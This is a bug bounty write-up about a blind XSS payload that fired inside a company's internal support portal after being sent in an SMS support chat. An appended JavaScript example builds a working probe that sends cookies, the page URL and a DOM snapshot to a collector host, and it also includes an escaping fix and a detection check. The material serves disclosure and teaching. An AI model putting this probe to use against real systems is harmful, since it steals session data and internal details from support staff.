Chevon Phillip

Summary

A security researcher successfully executed a blind XSS attack via an SMS support chat, leading to a $1100 bug bounty.

Abstract

In a recent bug bounty engagement, the author discovered that a company's support ticketing system was vulnerable to blind XSS. The company, referred to as example.com, offered support through email, phone calls and text messages. The researcher chose the SMS channel, created a ticket, and then opened a second ticket whose SMS body contained a blind XSS payload; that ticket became a live SMS exchange with a support agent. Because the payload is blind, the researcher could not see where it would run; it executed later inside an internal support portal that rendered the message, and what it reported back revealed details such as the support agent's first and last name. The researcher shared a redacted proof-of-concept image and emphasized testing for blind XSS in unexpected input channels like support chats. The write-up closes with an invitation to follow the author on social media.

Opinions

  • The author believes in the importance of testing non-traditional input channels for XSS vulnerabilities.
  • The success of the attack demonstrates the author's skill in identifying and exploiting security weaknesses in communication systems.
  • The author suggests that security researchers should be thorough and creative in their approach to finding vulnerabilities.
  • The disclosure of the bug bounty amount indicates the author's view of such programs as a valuable incentive for ethical hacking efforts.
  • By sharing the experience, the author shows a commitment to contributing to the knowledge base of the cybersecurity community.

Blind XSS via SMS Support Chat — $1100 Bug Bounty!

Hello Hunters! This is a quick write-up on how my blind XSS payload executed within an internal support portal via an SMS support chat.

This company (example.com) had a support site allowing users to submit a support ticket. You can create a support ticket in three ways:

  1. Email Support
  2. Phone Call Support
  3. Text message (SMS) support

Option 3 stood out to me, and I decided to play around with it. A few minutes after creating a ticket, I decided to make another one, this time injecting my blind XSS payload into the SMS message, which turned into a live SMS conversation between the support agent and myself.

Long story short: my payload got triggered after our chat ended with an internal note, which also leaked the first and last name of the support agent, and more.

Here is a redacted version of the PoC:

PoC Image of Internal Portal

Takeaways:

Always try your blind XSS payloads in places that are unlikely to expect one, like a support SMS chat. An SMS cannot carry markup, but the message text is stored and later rendered in a web-based agent portal, and that rendering context is where the payload executes, not the channel it was sent through.
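To make the rendering path concrete, here is an added JavaScript example (not the author's code, and not the company's portal) that models what the write-up describes: a blind XSS probe placed in an SMS body, a support portal that concatenates stored message text straight into HTML, the same portal with escaping applied, and the collector-side view that tells the tester where the probe fired. The collector URL, ticket contents, agent name and all function names are assumptions constructed for this example.

```javascript
// Added example, not code from the original write-up. It models the bug class the
// post describes: a customer's SMS body is stored by the ticketing system and later
// rendered as HTML inside an agent-facing web portal, where a blind XSS probe fires.
// COLLECTOR, the ticket data and all function names are hypothetical/constructed.

const COLLECTOR = "https://collector.example/hit"; // hypothetical out-of-band listener

// Blind-XSS probe of the kind placed in the SMS body. It is inert text until some
// renderer treats it as HTML; when it executes it POSTs where it fired (URL, title,
// cookies, a capped DOM snapshot) to the collector so the tester learns the context.
function buildProbe(collector) {
  return (
    `<img src=x onerror="fetch('${collector}',{method:'POST',mode:'no-cors',` +
    `body:JSON.stringify({u:location.href,t:document.title,c:document.cookie,` +
    `d:document.documentElement.outerHTML.slice(0,5000)})})">`
  );
}

// Constructed ticket: what the agent portal loads after the SMS gateway stores the
// conversation. Names and messages are made up for this example.
const sampleTicket = {
  id: 1042,
  channel: "sms",
  messages: [
    { from: "customer", body: "Hi, my order never arrived." },
    { from: "agent", body: "Sorry to hear that, let me check." },
    { from: "customer", body: buildProbe(COLLECTOR) },
  ],
  internalNote: "Closing ticket, customer unreachable. - Jane Doe (Tier 1)",
};

// VULNERABLE renderer: message bodies are concatenated straight into markup. SMS
// cannot carry HTML, which is exactly why nobody thought to escape it here.
function renderTranscriptVulnerable(ticket) {
  const msgs = ticket.messages
    .map((m) => `<div class="msg ${m.from}">${m.body}</div>`)
    .join("");
  return `<section id="ticket-${ticket.id}">${msgs}` +
    `<div class="note">${ticket.internalNote}</div></section>`;
}

// HARDENED renderer: every untrusted string is HTML-escaped before insertion.
// In a real app, prefer textContent or a framework that escapes by default.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderTranscriptSafe(ticket) {
  const msgs = ticket.messages
    .map((m) => `<div class="msg ${escapeHtml(m.from)}">${escapeHtml(m.body)}</div>`)
    .join("");
  return `<section id="ticket-${Number(ticket.id)}">${msgs}` +
    `<div class="note">${escapeHtml(ticket.internalNote)}</div></section>`;
}

// Quick check for reviewers: does rendered output still contain an executable tag
// or event handler that came from a message body? Heuristic, not an HTML parser.
function containsActiveMarkup(html) {
  return /<img\b[^>]*\bonerror\s*=/i.test(html) || /<script\b/i.test(html);
}

// Collector side: what the tester sees when the probe fires. The DOM snapshot is
// where details such as an agent's name in an internal note would show up.
function summarizeBeacon(jsonBody) {
  const b = JSON.parse(jsonBody);
  const note = /class="note">([^<]*)</.exec(b.d || "");
  return {
    host: new URL(b.u).host,
    title: b.t,
    hasCookies: typeof b.c === "string" && b.c.length > 0,
    domBytes: (b.d || "").length,
    agentNote: note ? note[1] : null,
  };
}

// Stand-alone demo.
if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable fires:", containsActiveMarkup(renderTranscriptVulnerable(sampleTicket)));
  console.log("hardened fires:  ", containsActiveMarkup(renderTranscriptSafe(sampleTicket)));
  const fakeBeacon = JSON.stringify({
    u: "https://support-internal.example/tickets/1042", // constructed, not a real host
    t: "Ticket #1042",
    c: "sid=abc123",
    d: renderTranscriptVulnerable(sampleTicket),
  });
  console.log(summarizeBeacon(fakeBeacon));
}
```

Run it with `node` to see the vulnerable transcript still carrying the `<img ... onerror=` handler while the escaped one carries only `&lt;img ...`. The collector summary is the part that matters for blind testing: the probe is sent with no idea whether anything will render it, and only the beacon's origin host, title and DOM snippet tell you it landed in an internal portal rather than a public page.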

I hope you like this short write-up. If you want to see more, please follow me here and on Twitter. https://twitter.com/ChevonPhillip

Bug Bounty
Bug Bounty Tips
Bug Bounty Writeup